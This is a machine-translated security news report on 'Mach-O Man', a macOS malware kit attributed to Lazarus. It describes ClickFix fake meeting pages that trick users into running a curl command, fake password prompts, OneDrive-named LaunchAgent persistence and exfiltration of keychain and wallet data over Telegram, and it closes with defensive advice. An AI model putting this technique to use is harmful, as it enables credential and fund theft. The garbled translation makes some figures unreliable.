The onset of Mach-O Mana new kit of Native malware for macOS Attributed to the North Korean group Lazarus, the attack has set off alarm bells across the global cryptocurrency and fintech ecosystem. The threat isn't limited to large exchanges or DeFi protocols; it also directly impacts European and Spanish companies that rely on Mac computers in their executive, treasury, and development departments.
We are facing a campaign that Turn a work video call into a potential entry point to the corporate infrastructure. Instead of relying solely on technical vulnerabilities, Mach-O Man combines highly refined social engineering with modules specialized in credential theft, macOS keychains and access to wallets, which multiplies the risk for companies that handle large volumes of digital capital.
The Lazarus Group and its goals in crypto, DeFi and fintech
Behind Mach-O Man is the Lazarus GroupAlso known as Famous Chollima, this is one of the most active cyber operations units linked to North Korea. Various security reports estimate that this group has amassed around 6.700 million en cryptocurrency thefts since 2017, with blows to platforms such as KelpDAO, Drift, Bybit or Zerion.
Research from teams like CertiK, Bitso's Quetzal Team, and independent analysts suggests that Mach-O Man is part of a sustained financial strategy by the North Korean state. This would not be an isolated campaign, but rather another piece in a larger scheme aimed at draining capital from the crypto, DeFi, and fintech sectors.
According to CertiK researcher Natalie Newson, the crypto industry should start looking at Lazarus just as traditional banks observe state actorsas a continuous, well-funded, and persistent threat. In just a few weeks, more than $500 million has been diverted through exploits linked to protocols like Drift and KelpDAO, reinforcing the idea of a coordinated offensive.
Lazarus's current focus is profiles with highly sensitive access within high-value organizations: fintech executives, Web3 developers, product managers, and treasury teams working at exchanges, DeFi projects, and regulated crypto service providers. Many of them, especially in Europe and Spain, use Macs on a daily basis.
For companies based in cities like Madrid, Barcelona, Valencia, Malaga, Berlin or AmsterdamIn this area, where neobanks, institutional custodians, and crypto startups are concentrated, the message is clear: if you handle digital liquidity, DeFi integrations, or critical SaaS infrastructure from macOS, you fall squarely into the Mach-O Man risk profile.
What is Mach-O Man and how is it built?
Mach-O Man is described as a modular malware kit for macOSDeveloped by the Chollima division of the Lazarus Group, it is written in Go and compiled as native Mach-O binariesThat is, the standard executable format in macOS, for both Intel and Apple Silicon processors.
The choice of Go and the Mach-O format allows the kit components to integrate naturally into the Apple environmentBypassing some common barriers that block less optimized executables, this is relevant because a large number of crypto and fintech companies use Macs in key management, legal, commercial, and technical positions.
The kit works on multiple linked stagesEach component has a specific function: downloading malicious binaries, gathering system information, establishing persistence, and ultimately, massive data theft. Its modular design allows attackers to tailor the campaign to the type of victim and the financial objective of each operation.
One of Mach-O Man's most delicate abilities is his interaction with the macOS keychainwhere the system stores passwords, private keys, recovery phrases, and other sensitive information. In addition, the kit's modules analyze browser extensions and data such as Chrome, Safari, Firefox, Brave, Opera or Vivaldi, which opens the door to the theft of session cookies, access tokens and saved credentials.
Researchers have even observed programming errors In some components, there is a bug that causes an infinite loop and abnormal CPU usage. This type of vulnerability, while it may reveal the presence of malware, suggests that the kit was deployed somewhat hastily, perhaps to exploit specific attack windows before defenders could adjust their controls.
ClickFix: The video call trap that compromises your Mac
The most unsettling aspect of Mach-O Man is not only its code, but how does he get into the teams?Instead of exploiting a classic technical flaw, the campaign relies on a social engineering technique called ClickFix, which aims to trick the user into executing the malicious command, thinking they are performing a routine support step.
The scheme usually starts with a urgent invitation to a meeting Sent via Telegram. The message promises a video call via Zoom, Microsoft Teams, or Google Meet and, in many cases, appears entirely legitimate because it comes from compromised accounts of real contacts: industry colleagues, business partners, suppliers, or even trusted technical staff.
Upon clicking, the victim is redirected to a fake but very convincing websitewhich mimics the aesthetics of the video calling platform or services like Cloudflare. There, a supposed connection or compatibility error appears, along with a seemingly innocuous solution: copy and paste a simple command into the macOS Terminal to "fix the problem."
That command is the heart of the deception. When executed, it downloads and launches the initial stager of the malwareThis is often done using a binary file like teamsSDK.bin via curl. Since the user initiates the command from the Terminal, mechanisms like Gatekeeper tend to treat this execution as an authorized action, so many automated defenses are not triggered.
In some documented incidents, attackers linked to Lazarus have even gone so far as to hijack DeFi project domains and replace their websites with a fake Cloudflare message that prompts users to enter a verification command. The pattern is identical: disguising a critical security step as a simple technical check.
The four phases of the attack: from infection to credential theft
Once the victim has fallen into the ClickFix trap and executed the command, Mach-O Man deploys an attack flow in four major stages, described in detail by Bitso's Quetzal Team and other analysts.
In the first one, the stager Download and run additional binaries written in Gosigned with certificates created specifically to appear legitimate. At this point, a fake application package may be displayed requesting the macOS password; researchers have even detected that the login window "shakes" on the first two attempts and accepts the password on the third, an interface trick to reinforce the feeling of normalcy.
The second phase focuses on the system profilingOne module is responsible for gathering as much information as possible about the machine: hostname, UUID, CPU type, macOS version, running processes, network configuration, and extensions installed in major browsers. With this data, the attackers assess the importance of the target and adapt the rest of the operation accordingly.
In the third stage, the malware establishes a persistence mechanismTo do this, it installs a component disguised as an application called OneDrive in a hidden location, usually a folder with a name like "Antivirus Service," and registers a LaunchAgent under identifiers such as com.onedrive.launcher.plist. This ensures it runs automatically every time the user logs in.
The fourth and final phase activates a stealer specializing in stealing sensitive dataIdentified in some analyses as macrasv2, this module collects SQLite databases containing browser credentials, session cookies, wallet extension information, macOS keychain entries, and anything else that could facilitate direct access to funds and internal systems. The content is compressed and sent externally via the Telegram bot API.
The link to cryptocurrency theft is immediate: the macOS keychain can contain private keys, seed phrases, and passwords for exchange platformsCombined with active session cookies and access tokens, these credentials allow attackers to operate on the victim's funds without breaking additional protocols or raising immediate suspicion.
Telegram as a channel for exfiltration and self-destruction of malware
One particularly striking feature of Mach-O Man is its extensive use of Telegram as a command and exfiltration channelThe stealer sends the stolen data by sending requests to the platform's bot API, disguising some of its traffic as a service that many organizations use legitimately.
The researchers have come to identify Telegram bot tokens embedded in binariesThis operational oversight could be exploited to monitor malicious channels or even disrupt part of the command and control infrastructure. Even so, as long as these bots remain active, the transmission of information to Lazarus operators remains relatively discreet.
Mach-O Man also incorporates features of self destructionAfter completing their primary tasks, many of its components execute deletion commands using commands like `rm`, removing local traces of the infection. This way, when the affected company detects unusual behavior or theft of funds, the malware may have already disappeared from the computer.
This "quick and clean hit" approach significantly complicates the subsequent forensic analysisWithout clear artifacts in the system, security teams have to rely on network logs, residual signals, and event correlation to reconstruct the incident. In European environments where fleets of Macs are managed by neobanks, payment providers, or tokenized asset managers, this lack of a clear footprint makes it difficult to measure the true extent of the access gained by attackers.
In fact, experts like Natalie Newson emphasize that Many victims are still unaware that they have been compromised. And, even if they suspect it, they will not always be able to identify which specific variant of Mach-O Man was involved or what volume of information was compromised, which adds uncertainty to the response and internal communication phase.
Relationship with major robberies and context for Europe and Spain
Mach-O Man didn't appear out of nowhere: it's the latest in a long line of attacks attributed to Lazarus against the crypto and fintech ecosystem worldwide. These include massive thefts of... DeFi protocols, centralized exchanges, and wallet providers, with figures that, in some cases, exceed one billion dollars.
Cases such as the KelpDAO hack, the Drift exploit, or the Bybit attack for around 1.400 million These incidents demonstrate Lazarus's ability to combine in-depth infrastructure knowledge with extremely fast and precise operations. On another level, "smaller" incidents, such as the theft of approximately $100.000 from Zerion using AI-assisted social engineering, show that the group is equally adept at high-profile heists and ongoing, more discreet but repeated campaigns.
In this context, Mach-O Man fits into a people-centric attack modelInstead of directly targeting the code of a smart contract, the campaign targets those responsible for managing treasuries, administrative keys, and internal access. The ultimate goal is the same: to seize the funds, but by attacking the human element.
For Europe, where the supply of regulated crypto services and next-generation fintech has expanded significantly, this represents a shift in the landscape. Banks with digital banking divisions, asset managers exploring tokenization, and payment companies offering crypto services are now part of a shared risk map with purely Web3 exchanges.
In Spain, technology hubs such as Madrid, Barcelona, Valencia or Malaga They concentrate crypto startups, alternative investment platforms, and DeFi projects with significant exposure to digital assets. Many of these players use macOS extensively in management, compliance, business development, and operations roles, placing them in the natural radar of campaigns like Mach-O Man.
Why it's so difficult to detect: the human factor as a weak point
One of the keys to Mach-O Man's success is that It does not exploit a classic technical vulnerability.but a human weakness. The attack relies on the victim pasting a command into their Mac's Terminal, believing they are resolving a connection problem or validating an urgent video call.
Traditional security controls are better equipped to identify suspicious attachments, unauthorized executables, or automated exploits than to stop a legitimate order issued by the user. If the command arrives wrapped in a credible context—a last-minute meeting with a key partner, a supposed notification from Cloudflare, a message that appears to come from a known provider—the probability that someone will execute it increases significantly.
The campaign takes advantage of a widespread reality in technology and finance companies: Tight schedules, constant video calls, and decisions under pressureIn that environment, an impromptu meeting or a "routine" technical step doesn't usually raise too many suspicions, especially if it comes from a channel like Telegram where many crypto communities operate daily.
Furthermore, the modular nature of Mach-O Man This complicates the task of generating reliable static signatures. Analysts like Vladimir S have detected multiple variants of the attack, meaning that the components can change rapidly even if the social script remains the same. If defenses rely solely on classic indicators, attackers retain room to adapt the campaign.
In addition to all this, there is the malware's ability to to be deleted after completing its missionWhen a drain on funds or unusual activity is detected in corporate accounts, the trail on the compromised Mac may be minimal, making it more difficult to quickly and accurately attribute the incident to Mach-O Man.
Practical steps for crypto and fintech companies using macOS
The cybersecurity teams that have analyzed Mach-O Man have raised a number of concerns. concrete recommendations for European and Spanish organizations that use Macs in positions of high responsibility and exposure to digital assets.
On a technical level, it is suggested to carry out periodic audits of LaunchAgents directories Looking for suspicious entries, paying particular attention to references such as com.onedrive.launcher.plist or OneDrive processes running from unusual paths, for example, hidden folders with names like “Antivirus Service”. This scan can be automated using scripts or integrated into fleet management platforms.
It is also recommended Monitor or limit traffic to the Telegram Bot API from corporate teams, especially in environments where there is no justified use of Telegram bots. While it won't always be feasible to block Telegram completely, finer controls can be established over this type of communication, thus reducing the data exfiltration surface.
In the area of internal awareness, experts emphasize a simple but crucial message: Never paste a command from an unverified webpage or meeting link into the Terminal.This idea, which may seem like common sense, requires continuous training, practical examples and simulations, especially in teams that are always in a hurry and receive constant invitations to video calls.
Another basic tip is Check through an alternative channel for any urgent invitations. that includes unusual technical steps. If a supposed colleague asks you to run a command in the Terminal, it's advisable to confirm it via company email, official internal messaging, or a phone call before taking any action. This double-check, although somewhat cumbersome, drastically reduces the chances of falling for scams like ClickFix.
Finally, it is recommended that organizations based in Spain and the rest of the European Union integrate engagement indicators associated with Mach-O Man Their detection and response tools include: hashes of identified binaries, related IP addresses, suspicious command patterns in the Terminal, and alerts for anomalous CPU spikes in unknown processes. Even if the malware attempts to self-destruct, these traces can help detect intrusion attempts or ongoing infections.
The Mach-O Man campaign illustrates the extent to which the combination of modular malware, social engineering, and covert exfiltration channels It can turn a seemingly innocent video call into the trigger for a critical breach. In an increasingly regulated European environment with greater exposure to digital capital, especially in Spanish companies that rely on macOS in their decision-making roles, strengthening security culture, being wary of improvised commands, and validating emergencies through more than one channel is becoming a basic necessity to protect credentials, systems, and digital wallets.
